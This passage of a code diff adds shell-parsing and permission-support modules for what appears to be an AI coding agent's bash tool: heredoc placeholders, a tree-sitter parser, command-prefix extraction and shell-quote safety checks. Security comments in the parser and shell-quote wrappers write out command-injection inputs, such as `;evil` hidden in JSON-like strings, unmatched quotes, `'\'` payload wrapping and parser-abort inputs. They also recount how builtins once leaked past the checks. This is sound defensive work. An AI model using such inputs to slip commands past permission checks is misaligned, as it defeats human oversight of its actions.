+  // Check for multiple heredocs sharing the same content start position
+  // (i.e., on the same line). This causes index corruption during replacement
+  // because indices are calculated on the original string but applied to
+  // a progressively modified string. Return without extraction - the fallback
+  // is safe (requires manual approval or fails parsing).
+  const contentStartPositions = new Set(
+    topLevelHeredocs.map(h => h.contentStartIndex),
+  )
+  if (contentStartPositions.size < topLevelHeredocs.length) {
+    return { processedCommand: command, heredocs }
+  }
+
+  // Sort by content end position descending so we can replace from end to start
+  // (this preserves indices for earlier replacements)
+  topLevelHeredocs.sort((a, b) => b.contentEndIndex - a.contentEndIndex)
+
+  // Generate a unique salt for this extraction to prevent placeholder collisions
+  // with literal "__HEREDOC_N__" text in commands
+  const salt = generatePlaceholderSalt()
+
+  let processedCommand = command
+  topLevelHeredocs.forEach((info, index) => {
+    // Use reverse index since we sorted descending
+    const placeholderIndex = topLevelHeredocs.length - 1 - index
+    const placeholder = `${HEREDOC_PLACEHOLDER_PREFIX}${placeholderIndex}_${salt}${HEREDOC_PLACEHOLDER_SUFFIX}`
+
+    heredocs.set(placeholder, info)
+
+    // Replace heredoc with placeholder while preserving same-line content:
+    // - Keep everything before the operator
+    // - Replace operator with placeholder
+    // - Keep content between operator and heredoc content (e.g., " && echo done")
+    // - Remove the heredoc content (from newline through closing delimiter)
+    // - Keep everything after the closing delimiter
+    processedCommand =
+      processedCommand.slice(0, info.operatorStartIndex) +
+      placeholder +
+      processedCommand.slice(info.operatorEndIndex, info.contentStartIndex) +
+      processedCommand.slice(info.contentEndIndex)
+  })
+
+  return { processedCommand, heredocs }
+}
+
+/**
+ * Restores heredoc placeholders back to their original content in a single string.
+ * Internal helper used by restoreHeredocs.
+ */
+function restoreHeredocsInString(
+  text: string,
+  heredocs: Map<string, HeredocInfo>,
+): string {
+  let result = text
+  for (const [placeholder, info] of heredocs) {
+    result = result.replaceAll(placeholder, info.fullText)
+  }
+  return result
+}
+
+/**
+ * Restores heredoc placeholders in an array of strings.
+ *
+ * @param parts - Array of strings that may contain heredoc placeholders
+ * @param heredocs - The map of placeholders from `extractHeredocs`
+ * @returns New array with placeholders replaced by original heredoc content
+ */
+export function restoreHeredocs(
+  parts: string[],
+  heredocs: Map<string, HeredocInfo>,
+): string[] {
+  if (heredocs.size === 0) {
+    return parts
+  }
+
+  return parts.map(part => restoreHeredocsInString(part, heredocs))
+}
+
+/**
+ * Checks if a command contains heredoc syntax.
+ *
+ * This is a quick check that doesn't validate the heredoc is well-formed,
+ * just that the pattern exists.
+ *
+ * @param command - The shell command string
+ * @returns true if the command appears to contain heredoc syntax
+ */
+export function containsHeredoc(command: string): boolean {
+  return HEREDOC_START_PATTERN.test(command)
+}
@@ -0,0 +1,230 @@
+import { feature } from 'bun:bundle'
+import { logEvent } from '../../services/analytics/index.js'
+import { logForDebugging } from '../debug.js'
+import {
+  ensureParserInitialized,
+  getParserModule,
+  type TsNode,
+} from './bashParser.js'
+
+export type Node = TsNode
+
+export interface ParsedCommandData {
+  rootNode: Node
+  envVars: string[]
+  commandNode: Node | null
+  originalCommand: string
+}
+
+const MAX_COMMAND_LENGTH = 10000
+const DECLARATION_COMMANDS = new Set([
+  'export',
+  'declare',
+  'typeset',
+  'readonly',
+  'local',
+  'unset',
+  'unsetenv',
+])
+const ARGUMENT_TYPES = new Set(['word', 'string', 'raw_string', 'number'])
+const SUBSTITUTION_TYPES = new Set([
+  'command_substitution',
+  'process_substitution',
+])
+const COMMAND_TYPES = new Set(['command', 'declaration_command'])
+
+let logged = false
+function logLoadOnce(success: boolean): void {
+  if (logged) return
+  logged = true
+  logForDebugging(
+    success ? 'tree-sitter: native module loaded' : 'tree-sitter: unavailable',
+  )
+  logEvent('tengu_tree_sitter_load', { success })
+}
+
+/**
+ * Awaits WASM init (Parser.init + Language.load). Must be called before
+ * parseCommand/parseCommandRaw for the parser to be available. Idempotent.
+ */
+export async function ensureInitialized(): Promise<void> {
+  if (feature('TREE_SITTER_BASH') || feature('TREE_SITTER_BASH_SHADOW')) {
+    await ensureParserInitialized()
+  }
+}
+
+export async function parseCommand(
+  command: string,
+): Promise<ParsedCommandData | null> {
+  if (!command || command.length > MAX_COMMAND_LENGTH) return null
+
+  // Gate: ant-only until pentest. External builds fall back to legacy
+  // regex/shell-quote path. Guarding the whole body inside the positive
+  // branch lets Bun DCE the NAPI import AND keeps telemetry honest — we
+  // only fire tengu_tree_sitter_load when a load was genuinely attempted.
+  if (feature('TREE_SITTER_BASH')) {
+    await ensureParserInitialized()
+    const mod = getParserModule()
+    logLoadOnce(mod !== null)
+    if (!mod) return null
+
+    try {
+      const rootNode = mod.parse(command)
+      if (!rootNode) return null
+
+      const commandNode = findCommandNode(rootNode, null)
+      const envVars = extractEnvVars(commandNode)
+
+      return { rootNode, envVars, commandNode, originalCommand: command }
+    } catch {
+      return null
+    }
+  }
+  return null
+}
+
+/**
+ * SECURITY: Sentinel for "parser was loaded and attempted, but aborted"
+ * (timeout / node budget / Rust panic). Distinct from `null` (module not
+ * loaded). Adversarial input can trigger abort under MAX_COMMAND_LENGTH:
+ * `(( a[0][0]... ))` with ~2800 subscripts hits PARSE_TIMEOUT_MICROS.
+ * Callers MUST treat this as fail-closed (too-complex), NOT route to legacy.
+ */
+export const PARSE_ABORTED = Symbol('parse-aborted')
+
+/**
+ * Raw parse — skips findCommandNode/extractEnvVars which the security
+ * walker in ast.ts doesn't use. Saves one tree walk per bash command.
+ *
+ * Returns:
+ *   - Node: parse succeeded
+ *   - null: module not loaded / feature off / empty / over-length
+ *   - PARSE_ABORTED: module loaded but parse failed (timeout/panic)
+ */
+export async function parseCommandRaw(
+  command: string,
+): Promise<Node | null | typeof PARSE_ABORTED> {
+  if (!command || command.length > MAX_COMMAND_LENGTH) return null
+  if (feature('TREE_SITTER_BASH') || feature('TREE_SITTER_BASH_SHADOW')) {
+    await ensureParserInitialized()
+    const mod = getParserModule()
+    logLoadOnce(mod !== null)
+    if (!mod) return null
+    try {
+      const result = mod.parse(command)
+      // SECURITY: Module loaded; null here = timeout/node-budget abort in
+      // bashParser.ts (PARSE_TIMEOUT_MS=50, MAX_NODES=50_000).
+      // Previously collapsed into `return null` → parse-unavailable → legacy
+      // path, which lacks EVAL_LIKE_BUILTINS — `trap`, `enable`, `hash` leaked.
+      if (result === null) {
+        logEvent('tengu_tree_sitter_parse_abort', {
+          cmdLength: command.length,
+          panic: false,
+        })
+        return PARSE_ABORTED
+      }
+      return result
+    } catch {
+      logEvent('tengu_tree_sitter_parse_abort', {
+        cmdLength: command.length,
+        panic: true,
+      })
+      return PARSE_ABORTED
+    }
+  }
+  return null
+}
+
+function findCommandNode(node: Node, parent: Node | null): Node | null {
+  const { type, children } = node
+
+  if (COMMAND_TYPES.has(type)) return node
+
+  // Variable assignment followed by command
+  if (type === 'variable_assignment' && parent) {
+    return (
+      parent.children.find(
+        c => COMMAND_TYPES.has(c.type) && c.startIndex > node.startIndex,
+      ) ?? null
+    )
+  }
+
+  // Pipeline: recurse into first child (which may be a redirected_statement)
+  if (type === 'pipeline') {
+    for (const child of children) {
+      const result = findCommandNode(child, node)
+      if (result) return result
+    }
+    return null
+  }
+
+  // Redirected statement: find the command inside
+  if (type === 'redirected_statement') {
+    return children.find(c => COMMAND_TYPES.has(c.type)) ?? null
+  }
+
+  // Recursive search
+  for (const child of children) {
+    const result = findCommandNode(child, node)
+    if (result) return result
+  }
+
+  return null
+}
+
+function extractEnvVars(commandNode: Node | null): string[] {
+  if (!commandNode || commandNode.type !== 'command') return []
+
+  const envVars: string[] = []
+  for (const child of commandNode.children) {
+    if (child.type === 'variable_assignment') {
+      envVars.push(child.text)
+    } else if (child.type === 'command_name' || child.type === 'word') {
+      break
+    }
+  }
+  return envVars
+}
+
+export function extractCommandArguments(commandNode: Node): string[] {
+  // Declaration commands
+  if (commandNode.type === 'declaration_command') {
+    const firstChild = commandNode.children[0]
+    return firstChild && DECLARATION_COMMANDS.has(firstChild.text)
+      ? [firstChild.text]
+      : []
+  }
+
+  const args: string[] = []
+  let foundCommandName = false
+
+  for (const child of commandNode.children) {
+    if (child.type === 'variable_assignment') continue
+
+    // Command name
+    if (
+      child.type === 'command_name' ||
+      (!foundCommandName && child.type === 'word')
+    ) {
+      foundCommandName = true
+      args.push(child.text)
+      continue
+    }
+
+    // Arguments
+    if (ARGUMENT_TYPES.has(child.type)) {
+      args.push(stripQuotes(child.text))
+    } else if (SUBSTITUTION_TYPES.has(child.type)) {
+      break
+    }
+  }
+  return args
+}
+
+function stripQuotes(text: string): string {
+  return text.length >= 2 &&
+    ((text[0] === '"' && text.at(-1) === '"') ||
+      (text[0] === "'" && text.at(-1) === "'"))
+    ? text.slice(1, -1)
+    : text
+}
@@ -0,0 +1,204 @@
+import { buildPrefix } from '../shell/specPrefix.js'
+import { splitCommand_DEPRECATED } from './commands.js'
+import { extractCommandArguments, parseCommand } from './parser.js'
+import { getCommandSpec } from './registry.js'
+
+const NUMERIC = /^\d+$/
+const ENV_VAR = /^[A-Za-z_][A-Za-z0-9_]*=/
+
+// Wrapper commands with complex option handling that can't be expressed in specs
+const WRAPPER_COMMANDS = new Set([
+  'nice', // command position varies based on options
+])
+
+const toArray = <T>(val: T | T[]): T[] => (Array.isArray(val) ? val : [val])
+
+// Check if args[0] matches a known subcommand (disambiguates wrapper commands
+// that also have subcommands, e.g. the git spec has isCommand args for aliases).
+function isKnownSubcommand(
+  arg: string,
+  spec: { subcommands?: { name: string | string[] }[] } | null,
+): boolean {
+  if (!spec?.subcommands?.length) return false
+  return spec.subcommands.some(sub =>
+    Array.isArray(sub.name) ? sub.name.includes(arg) : sub.name === arg,
+  )
+}
+
+export async function getCommandPrefixStatic(
+  command: string,
+  recursionDepth = 0,
+  wrapperCount = 0,
+): Promise<{ commandPrefix: string | null } | null> {
+  if (wrapperCount > 2 || recursionDepth > 10) return null
+
+  const parsed = await parseCommand(command)
+  if (!parsed) return null
+  if (!parsed.commandNode) {
+    return { commandPrefix: null }
+  }
+
+  const { envVars, commandNode } = parsed
+  const cmdArgs = extractCommandArguments(commandNode)
+
+  const [cmd, ...args] = cmdArgs
+  if (!cmd) return { commandPrefix: null }
+
+  // Check if this is a wrapper command by looking at its spec
+  const spec = await getCommandSpec(cmd)
+  // Check if this is a wrapper command
+  let isWrapper =
+    WRAPPER_COMMANDS.has(cmd) ||
+    (spec?.args && toArray(spec.args).some(arg => arg?.isCommand))
+
+  // Special case: if the command has subcommands and the first arg matches a subcommand,
+  // treat it as a regular command, not a wrapper
+  if (isWrapper && args[0] && isKnownSubcommand(args[0], spec)) {
+    isWrapper = false
+  }
+
+  const prefix = isWrapper
+    ? await handleWrapper(cmd, args, recursionDepth, wrapperCount)
+    : await buildPrefix(cmd, args, spec)
+
+  if (prefix === null && recursionDepth === 0 && isWrapper) {
+    return null
+  }
+
+  const envPrefix = envVars.length ? `${envVars.join(' ')} ` : ''
+  return { commandPrefix: prefix ? envPrefix + prefix : null }
+}
+
+async function handleWrapper(
+  command: string,
+  args: string[],
+  recursionDepth: number,
+  wrapperCount: number,
+): Promise<string | null> {
+  const spec = await getCommandSpec(command)
+
+  if (spec?.args) {
+    const commandArgIndex = toArray(spec.args).findIndex(arg => arg?.isCommand)
+
+    if (commandArgIndex !== -1) {
+      const parts = [command]
+
+      for (let i = 0; i < args.length && i <= commandArgIndex; i++) {
+        if (i === commandArgIndex) {
+          const result = await getCommandPrefixStatic(
+            args.slice(i).join(' '),
+            recursionDepth + 1,
+            wrapperCount + 1,
+          )
+          if (result?.commandPrefix) {
+            parts.push(...result.commandPrefix.split(' '))
+            return parts.join(' ')
+          }
+          break
+        } else if (
+          args[i] &&
+          !args[i]!.startsWith('-') &&
+          !ENV_VAR.test(args[i]!)
+        ) {
+          parts.push(args[i]!)
+        }
+      }
+    }
+  }
+
+  const wrapped = args.find(
+    arg => !arg.startsWith('-') && !NUMERIC.test(arg) && !ENV_VAR.test(arg),
+  )
+  if (!wrapped) return command
+
+  const result = await getCommandPrefixStatic(
+    args.slice(args.indexOf(wrapped)).join(' '),
+    recursionDepth + 1,
+    wrapperCount + 1,
+  )
+
+  return !result?.commandPrefix ? null : `${command} ${result.commandPrefix}`
+}
+
+/**
+ * Computes prefixes for a compound command (with && / || / ;).
+ * For single commands, returns a single-element array with the prefix.
+ *
+ * For compound commands, computes per-subcommand prefixes and collapses
+ * them: subcommands sharing a root (first word) are collapsed via
+ * word-aligned longest common prefix.
+ *
+ * @param excludeSubcommand — optional filter; return true for subcommands
+ *   that should be excluded from the prefix suggestion (e.g. read-only
+ *   commands that are already auto-allowed).
+ */
+export async function getCompoundCommandPrefixesStatic(
+  command: string,
+  excludeSubcommand?: (subcommand: string) => boolean,
+): Promise<string[]> {
+  const subcommands = splitCommand_DEPRECATED(command)
+  if (subcommands.length <= 1) {
+    const result = await getCommandPrefixStatic(command)
+    return result?.commandPrefix ? [result.commandPrefix] : []
+  }
+
+  const prefixes: string[] = []
+  for (const subcmd of subcommands) {
+    const trimmed = subcmd.trim()
+    if (excludeSubcommand?.(trimmed)) continue
+    const result = await getCommandPrefixStatic(trimmed)
+    if (result?.commandPrefix) {
+      prefixes.push(result.commandPrefix)
+    }
+  }
+
+  if (prefixes.length === 0) return []
+
+  // Group prefixes by their first word (root command)
+  const groups = new Map<string, string[]>()
+  for (const prefix of prefixes) {
+    const root = prefix.split(' ')[0]!
+    const group = groups.get(root)
+    if (group) {
+      group.push(prefix)
+    } else {
+      groups.set(root, [prefix])
+    }
+  }
+
+  // Collapse each group via word-aligned LCP
+  const collapsed: string[] = []
+  for (const [, group] of groups) {
+    collapsed.push(longestCommonPrefix(group))
+  }
+  return collapsed
+}
+
+/**
+ * Compute the longest common prefix of strings, aligned to word boundaries.
+ * e.g. ["git fetch", "git worktree"] → "git"
+ *      ["npm run test", "npm run lint"] → "npm run"
+ */
+function longestCommonPrefix(strings: string[]): string {
+  if (strings.length === 0) return ''
+  if (strings.length === 1) return strings[0]!
+
+  const first = strings[0]!
+  const words = first.split(' ')
+  let commonWords = words.length
+
+  for (let i = 1; i < strings.length; i++) {
+    const otherWords = strings[i]!.split(' ')
+    let shared = 0
+    while (
+      shared < commonWords &&
+      shared < otherWords.length &&
+      words[shared] === otherWords[shared]
+    ) {
+      shared++
+    }
+    commonWords = shared
+  }
+
+  return words.slice(0, Math.max(1, commonWords)).join(' ')
+}
@@ -0,0 +1,53 @@
+import { memoizeWithLRU } from '../memoize.js'
+import specs from './specs/index.js'
+
+export type CommandSpec = {
+  name: string
+  description?: string
+  subcommands?: CommandSpec[]
+  args?: Argument | Argument[]
+  options?: Option[]
+}
+
+export type Argument = {
+  name?: string
+  description?: string
+  isDangerous?: boolean
+  isVariadic?: boolean // repeats infinitely e.g. echo hello world
+  isOptional?: boolean
+  isCommand?: boolean // wrapper commands e.g. timeout, sudo
+  isModule?: string | boolean // for python -m and similar module args
+  isScript?: boolean // script files e.g. node script.js
+}
+
+export type Option = {
+  name: string | string[]
+  description?: string
+  args?: Argument | Argument[]
+  isRequired?: boolean
+}
+
+export async function loadFigSpec(
+  command: string,
+): Promise<CommandSpec | null> {
+  if (!command || command.includes('/') || command.includes('\\')) return null
+  if (command.includes('..')) return null
+  if (command.startsWith('-') && command !== '-') return null
+
+  try {
+    const module = await import(`@withfig/autocomplete/build/${command}.js`)
+    return module.default || module
+  } catch {
+    return null
+  }
+}
+export const getCommandSpec = memoizeWithLRU(
+  async (command: string): Promise<CommandSpec | null> => {
+    const spec =
+      specs.find(s => s.name === command) ||
+      (await loadFigSpec(command)) ||
+      null
+    return spec
+  },
+  (command: string) => command,
+)
@@ -0,0 +1,259 @@
+import type { SuggestionItem } from 'src/components/PromptInput/PromptInputFooterSuggestions.js'
+import {
+  type ParseEntry,
+  quote,
+  tryParseShellCommand,
+} from '../bash/shellQuote.js'
+import { logForDebugging } from '../debug.js'
+import { getShellType } from '../localInstaller.js'
+import * as Shell from '../Shell.js'
+
+// Constants
+const MAX_SHELL_COMPLETIONS = 15
+const SHELL_COMPLETION_TIMEOUT_MS = 1000
+const COMMAND_OPERATORS = ['|', '||', '&&', ';'] as const
+
+export type ShellCompletionType = 'command' | 'variable' | 'file'
+
+type InputContext = {
+  prefix: string
+  completionType: ShellCompletionType
+}
+
+/**
+ * Check if a parsed token is a command operator (|, ||, &&, ;)
+ */
+function isCommandOperator(token: ParseEntry): boolean {
+  return (
+    typeof token === 'object' &&
+    token !== null &&
+    'op' in token &&
+    (COMMAND_OPERATORS as readonly string[]).includes(token.op as string)
+  )
+}
+
+/**
+ * Determine completion type based solely on prefix characteristics
+ */
+function getCompletionTypeFromPrefix(prefix: string): ShellCompletionType {
+  if (prefix.startsWith('$')) {
+    return 'variable'
+  }
+  if (
+    prefix.includes('/') ||
+    prefix.startsWith('~') ||
+    prefix.startsWith('.')
+  ) {
+    return 'file'
+  }
+  return 'command'
+}
+
+/**
+ * Find the last string token and its index in parsed tokens
+ */
+function findLastStringToken(
+  tokens: ParseEntry[],
+): { token: string; index: number } | null {
+  const i = tokens.findLastIndex(t => typeof t === 'string')
+  return i !== -1 ? { token: tokens[i] as string, index: i } : null
+}
+
+/**
+ * Check if we're in a context that expects a new command
+ * (at start of input or after a command operator)
+ */
+function isNewCommandContext(
+  tokens: ParseEntry[],
+  currentTokenIndex: number,
+): boolean {
+  if (currentTokenIndex === 0) {
+    return true
+  }
+  const prevToken = tokens[currentTokenIndex - 1]
+  return prevToken !== undefined && isCommandOperator(prevToken)
+}
+
+/**
+ * Parse input to extract completion context
+ */
+function parseInputContext(input: string, cursorOffset: number): InputContext {
+  const beforeCursor = input.slice(0, cursorOffset)
+
+  // Check if it's a variable prefix, before expanding with shell-quote
+  const varMatch = beforeCursor.match(/\$[a-zA-Z_][a-zA-Z0-9_]*$/)
+  if (varMatch) {
+    return { prefix: varMatch[0], completionType: 'variable' }
+  }
+
+  // Parse with shell-quote
+  const parseResult = tryParseShellCommand(beforeCursor)
+  if (!parseResult.success) {
+    // Fallback to simple parsing
+    const tokens = beforeCursor.split(/\s+/)
+    const prefix = tokens[tokens.length - 1] || ''
+    const isFirstToken = tokens.length === 1 && !beforeCursor.includes(' ')
+    const completionType = isFirstToken
+      ? 'command'
+      : getCompletionTypeFromPrefix(prefix)
+    return { prefix, completionType }
+  }
+
+  // Extract current token
+  const lastToken = findLastStringToken(parseResult.tokens)
+  if (!lastToken) {
+    // No string token found - check if after operator
+    const lastParsedToken = parseResult.tokens[parseResult.tokens.length - 1]
+    const completionType =
+      lastParsedToken && isCommandOperator(lastParsedToken)
+        ? 'command'
+        : 'command' // Default to command at start
+    return { prefix: '', completionType }
+  }
+
+  // If there's a trailing space, the user is starting a new argument
+  if (beforeCursor.endsWith(' ')) {
+    // After first token (command) with space = file argument expected
+    return { prefix: '', completionType: 'file' }
+  }
+
+  // Determine completion type from context
+  const baseType = getCompletionTypeFromPrefix(lastToken.token)
+
+  // If it's clearly a file or variable based on prefix, use that type
+  if (baseType === 'variable' || baseType === 'file') {
+    return { prefix: lastToken.token, completionType: baseType }
+  }
+
+  // For command-like tokens, check context: are we starting a new command?
+  const completionType = isNewCommandContext(
+    parseResult.tokens,
+    lastToken.index,
+  )
+    ? 'command'
+    : 'file' // Not after operator = file argument
+
+  return { prefix: lastToken.token, completionType }
+}
+
+/**
+ * Generate bash completion command using compgen
+ */
+function getBashCompletionCommand(
+  prefix: string,
+  completionType: ShellCompletionType,
+): string {
+  if (completionType === 'variable') {
+    // Variable completion - remove $ prefix
+    const varName = prefix.slice(1)
+    return `compgen -v ${quote([varName])} 2>/dev/null`
+  } else if (completionType === 'file') {
+    // File completion with trailing slash for directories and trailing space for files
+    // Use 'while read' to prevent command injection from filenames containing newlines
+    return `compgen -f ${quote([prefix])} 2>/dev/null | head -${MAX_SHELL_COMPLETIONS} | while IFS= read -r f; do [ -d "$f" ] && echo "$f/" || echo "$f "; done`
+  } else {
+    // Command completion
+    return `compgen -c ${quote([prefix])} 2>/dev/null`
+  }
+}
+
+/**
+ * Generate zsh completion command using native zsh commands
+ */
+function getZshCompletionCommand(
+  prefix: string,
+  completionType: ShellCompletionType,
+): string {
+  if (completionType === 'variable') {
+    // Variable completion - use zsh pattern matching for safe filtering
+    const varName = prefix.slice(1)
+    return `print -rl -- \${(k)parameters[(I)${quote([varName])}*]} 2>/dev/null`
+  } else if (completionType === 'file') {
+    // File completion with trailing slash for directories and trailing space for files
+    // Note: zsh glob expansion is safe from command injection (unlike bash for-in loops)
+    return `for f in ${quote([prefix])}*(N[1,${MAX_SHELL_COMPLETIONS}]); do [[ -d "$f" ]] && echo "$f/" || echo "$f "; done`
+  } else {
+    // Command completion - use zsh pattern matching for safe filtering
+    return `print -rl -- \${(k)commands[(I)${quote([prefix])}*]} 2>/dev/null`
+  }
+}
+
+/**
+ * Get completions for the given shell type
+ */
+async function getCompletionsForShell(
+  shellType: 'bash' | 'zsh',
+  prefix: string,
+  completionType: ShellCompletionType,
+  abortSignal: AbortSignal,
+): Promise<SuggestionItem[]> {
+  let command: string
+
+  if (shellType === 'bash') {
+    command = getBashCompletionCommand(prefix, completionType)
+  } else if (shellType === 'zsh') {
+    command = getZshCompletionCommand(prefix, completionType)
+  } else {
+    // Unsupported shell type
+    return []
+  }
+
+  const shellCommand = await Shell.exec(command, abortSignal, 'bash', {
+    timeout: SHELL_COMPLETION_TIMEOUT_MS,
+  })
+  const result = await shellCommand.result
+  return result.stdout
+    .split('\n')
+    .filter((line: string) => line.trim())
+    .slice(0, MAX_SHELL_COMPLETIONS)
+    .map((text: string) => ({
+      id: text,
+      displayText: text,
+      description: undefined,
+      metadata: { completionType },
+    }))
+}
+
+/**
+ * Get shell completions for the given input
+ * Supports bash and zsh shells (matches Shell.ts execution support)
+ */
+export async function getShellCompletions(
+  input: string,
+  cursorOffset: number,
+  abortSignal: AbortSignal,
+): Promise<SuggestionItem[]> {
+  const shellType = getShellType()
+
+  // Only support bash/zsh (matches Shell.ts execution support)
+  if (shellType !== 'bash' && shellType !== 'zsh') {
+    return []
+  }
+
+  try {
+    const { prefix, completionType } = parseInputContext(input, cursorOffset)
+
+    if (!prefix) {
+      return []
+    }
+
+    const completions = await getCompletionsForShell(
+      shellType,
+      prefix,
+      completionType,
+      abortSignal,
+    )
+
+    // Add inputSnapshot to all suggestions so we can detect when input changes
+    return completions.map(suggestion => ({
+      ...suggestion,
+      metadata: {
+        ...(suggestion.metadata as { completionType: ShellCompletionType }),
+        inputSnapshot: input,
+      },
+    }))
+  } catch (error) {
+    logForDebugging(`Shell completion failed: ${error}`)
+    return [] // Silent fail
+  }
+}
@@ -0,0 +1,28 @@
+import { quote } from './shellQuote.js'
+
+/**
+ * Parses a shell prefix that may contain an executable path and arguments.
+ *
+ * Examples:
+ * - "bash" -> quotes as 'bash'
+ * - "/usr/bin/bash -c" -> quotes as '/usr/bin/bash' -c
+ * - "C:\Program Files\Git\bin\bash.exe -c" -> quotes as 'C:\Program Files\Git\bin\bash.exe' -c
+ *
+ * @param prefix The shell prefix string containing executable and optional arguments
+ * @param command The command to be executed
+ * @returns The properly formatted command string with quoted components
+ */
+export function formatShellPrefixCommand(
+  prefix: string,
+  command: string,
+): string {
+  // Split on the last space before a dash to separate executable from arguments
+  const spaceBeforeDash = prefix.lastIndexOf(' -')
+  if (spaceBeforeDash > 0) {
+    const execPath = prefix.substring(0, spaceBeforeDash)
+    const args = prefix.substring(spaceBeforeDash + 1)
+    return `${quote([execPath])} ${args} ${quote([command])}`
+  } else {
+    return `${quote([prefix])} ${quote([command])}`
+  }
+}
@@ -0,0 +1,304 @@
+/**
+ * Safe wrappers for shell-quote library functions that handle errors gracefully
+ * These are drop-in replacements for the original functions
+ */
+
+import {
+  type ParseEntry,
+  parse as shellQuoteParse,
+  quote as shellQuoteQuote,
+} from 'shell-quote'
+import { logError } from '../log.js'
+import { jsonStringify } from '../slowOperations.js'
+
+export type { ParseEntry } from 'shell-quote'
+
+export type ShellParseResult =
+  | { success: true; tokens: ParseEntry[] }
+  | { success: false; error: string }
+
+export type ShellQuoteResult =
+  | { success: true; quoted: string }
+  | { success: false; error: string }
+
+export function tryParseShellCommand(
+  cmd: string,
+  env?:
+    | Record<string, string | undefined>
+    | ((key: string) => string | undefined),
+): ShellParseResult {
+  try {
+    const tokens =
+      typeof env === 'function'
+        ? shellQuoteParse(cmd, env)
+        : shellQuoteParse(cmd, env)
+    return { success: true, tokens }
+  } catch (error) {
+    if (error instanceof Error) {
+      logError(error)
+    }
+    return {
+      success: false,
+      error: error instanceof Error ? error.message : 'Unknown parse error',
+    }
+  }
+}
+
+export function tryQuoteShellArgs(args: unknown[]): ShellQuoteResult {
+  try {
+    const validated: string[] = args.map((arg, index) => {
+      if (arg === null || arg === undefined) {
+        return String(arg)
+      }
+
+      const type = typeof arg
+
+      if (type === 'string') {
+        return arg as string
+      }
+      if (type === 'number' || type === 'boolean') {
+        return String(arg)
+      }
+
+      if (type === 'object') {
+        throw new Error(
+          `Cannot quote argument at index ${index}: object values are not supported`,
+        )
+      }
+      if (type === 'symbol') {
+        throw new Error(
+          `Cannot quote argument at index ${index}: symbol values are not supported`,
+        )
+      }
+      if (type === 'function') {
+        throw new Error(
+          `Cannot quote argument at index ${index}: function values are not supported`,
+        )
+      }
+
+      throw new Error(
+        `Cannot quote argument at index ${index}: unsupported type ${type}`,
+      )
+    })
+
+    const quoted = shellQuoteQuote(validated)
+    return { success: true, quoted }
+  } catch (error) {
+    if (error instanceof Error) {
+      logError(error)
+    }
+    return {
+      success: false,
+      error: error instanceof Error ? error.message : 'Unknown quote error',
+    }
+  }
+}
+
+/**
+ * Checks if parsed tokens contain malformed entries that suggest shell-quote
+ * misinterpreted the command. This happens when input contains ambiguous
+ * patterns (like JSON-like strings with semicolons) that shell-quote parses
+ * according to shell rules, producing token fragments.
+ *
+ * For example, `echo {"hi":"hi;evil"}` gets parsed with `;` as an operator,
+ * producing tokens like `{hi:"hi` (unbalanced brace). Legitimate commands
+ * produce complete, balanced tokens.
+ *
+ * Also detects unterminated quotes in the original command: shell-quote
+ * silently drops an unmatched `"` or `'` and parses the rest as unquoted,
+ * leaving no trace in the tokens. `echo "hi;evil | cat` (one unmatched `"`)
+ * is a bash syntax error, but shell-quote yields clean tokens with `;` as
+ * an operator. The token-level checks below can't catch this, so we walk
+ * the original command with bash quote semantics and flag odd parity.
+ *
+ * Security: This prevents command injection via HackerOne #3482049 where
+ * shell-quote's correct parsing of ambiguous input can be exploited.
+ */
+export function hasMalformedTokens(
+  command: string,
+  parsed: ParseEntry[],
+): boolean {
+  // Check for unterminated quotes in the original command. shell-quote drops
+  // an unmatched quote without leaving any trace in the tokens, so this must
+  // inspect the raw string. Walk with bash semantics: backslash escapes the
+  // next char outside single-quotes; no escapes inside single-quotes.
+  let inSingle = false
+  let inDouble = false
+  let doubleCount = 0
+  let singleCount = 0
+  for (let i = 0; i < command.length; i++) {
+    const c = command[i]
+    if (c === '\\' && !inSingle) {
+      i++
+      continue
+    }
+    if (c === '"' && !inSingle) {
+      doubleCount++
+      inDouble = !inDouble
+    } else if (c === "'" && !inDouble) {
+      singleCount++
+      inSingle = !inSingle
+    }
+  }
+  if (doubleCount % 2 !== 0 || singleCount % 2 !== 0) return true
+
+  for (const entry of parsed) {
+    if (typeof entry !== 'string') continue
+
+    // Check for unbalanced curly braces
+    const openBraces = (entry.match(/{/g) || []).length
+    const closeBraces = (entry.match(/}/g) || []).length
+    if (openBraces !== closeBraces) return true
+
+    // Check for unbalanced parentheses
+    const openParens = (entry.match(/\(/g) || []).length
+    const closeParens = (entry.match(/\)/g) || []).length
+    if (openParens !== closeParens) return true
+
+    // Check for unbalanced square brackets
+    const openBrackets = (entry.match(/\[/g) || []).length
+    const closeBrackets = (entry.match(/\]/g) || []).length
+    if (openBrackets !== closeBrackets) return true
+
+    // Check for unbalanced double quotes
+    // Count quotes that aren't escaped (preceded by backslash)
+    // A token with an odd number of unescaped quotes is malformed
+    // eslint-disable-next-line custom-rules/no-lookbehind-regex -- gated by hasCommandSeparator check at caller, runs on short per-token strings
+    const doubleQuotes = entry.match(/(?<!\\)"/g) || []
+    if (doubleQuotes.length % 2 !== 0) return true
+
+    // Check for unbalanced single quotes
+    // eslint-disable-next-line custom-rules/no-lookbehind-regex -- same as above
+    const singleQuotes = entry.match(/(?<!\\)'/g) || []
+    if (singleQuotes.length % 2 !== 0) return true
+  }
+  return false
+}
+
+/**
+ * Detects commands containing '\' patterns that exploit the shell-quote library's
+ * incorrect handling of backslashes inside single quotes.
+ *
+ * In bash, single quotes preserve ALL characters literally - backslash has no
+ * special meaning. So '\' is just the string \ (the quote opens, contains \,
+ * and the next ' closes it). But shell-quote incorrectly treats \ as an escape
+ * character inside single quotes, causing '\' to NOT close the quoted string.
+ *
+ * This means the pattern '\' <payload> '\' hides <payload> from security checks
+ * because shell-quote thinks it's all one single-quoted string.
+ */
+export function hasShellQuoteSingleQuoteBug(command: string): boolean {
+  // Walk the command with correct bash single-quote semantics
+  let inSingleQuote = false
+  let inDoubleQuote = false
+
+  for (let i = 0; i < command.length; i++) {
+    const char = command[i]
+
+    // Handle backslash escaping outside of single quotes
+    if (char === '\\' && !inSingleQuote) {
+      // Skip the next character (it's escaped)
+      i++
+      continue
+    }
+
+    if (char === '"' && !inSingleQuote) {
+      inDoubleQuote = !inDoubleQuote
+      continue
+    }
+
+    if (char === "'" && !inDoubleQuote) {
+      inSingleQuote = !inSingleQuote
+
+      // Check if we just closed a single quote and the content ends with
+      // trailing backslashes. shell-quote's chunker regex '((\\'|[^'])*?)'
+      // incorrectly treats \' as an escape sequence inside single quotes,
+      // while bash treats backslash as literal. This creates a differential
+      // where shell-quote merges tokens that bash treats as separate.
+      //
